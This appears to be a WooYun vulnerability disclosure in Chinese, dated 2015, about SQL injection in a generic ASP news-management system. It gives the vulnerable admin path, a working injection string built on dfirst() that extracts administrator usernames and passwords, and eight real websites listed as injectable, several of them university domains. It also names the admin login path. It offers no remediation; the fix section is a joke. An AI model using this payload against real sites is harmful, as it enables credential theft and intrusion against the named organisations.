漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2015-089707
漏洞标题:某通用型系统SQL注射
相关厂商:讯时系统
漏洞作者: 小骇
提交时间:2015-01-05 16:24
修复时间:2015-04-05 16:26
公开时间:2015-04-05 16:26
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:11
漏洞状态:未联系到厂商或者厂商积极忽略
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2015-01-05: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-04-05: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
某通用型系统SQL注射
详细说明:
某通用型系统SQL注射。
注射地址:/admin/admin_news_pl_view.asp?action=save&id=1
注射代码:
|'+dfirst("[user]","[admin]")+chr(124)+dfirst("[pass]","[admin]"),username='
就可注入出用户密码。
案例:
http://www.zskaiyin.cn//admin/admin_news_pl_view.asp?action=save&id=1
http://zjw.hkuspace.edu.cn/news//admin/admin_news_pl_view.asp?action=save&id=2
http://zsjy.hezeu.edu.cn/admin/admin_news_pl_view.asp?action=save&id=2
http://www.swupl.edu.cn/yjsjy//admin/admin_news_pl_view.asp?action=save&id=1
http://www.zyepb.cn/news34//admin/admin_news_pl_view.asp?action=save&id=6
http://tyb.usts.edu.cn/news//admin/admin_news_pl_view.asp?action=save&id=2
http://www.qecc.cn//admin/admin_news_pl_view.asp?action=save&id=1
http://www.xhtu.com.cn/jwc//admin/admin_news_pl_view.asp?action=save&id=2
漏洞证明:
后台地址:/login.asp
证明如下:
http://www.zskaiyin.cn//admin/admin_news_pl_view.asp?action=save&id=1 为例。
还有其他网站均可注入数据:
http://zjw.hkuspace.edu.cn/news//admin/admin_news_pl_view.asp?action=save&id=2
http://zsjy.hezeu.edu.cn/admin/admin_news_pl_view.asp?action=save&id=2
http://www.swupl.edu.cn/yjsjy//admin/admin_news_pl_view.asp?action=save&id=1
修复方案:
我要压岁钱,有木有?
版权声明:转载请注明来源 小骇@乌云
漏洞回应
厂商回应:
未能联系到厂商或者厂商积极拒绝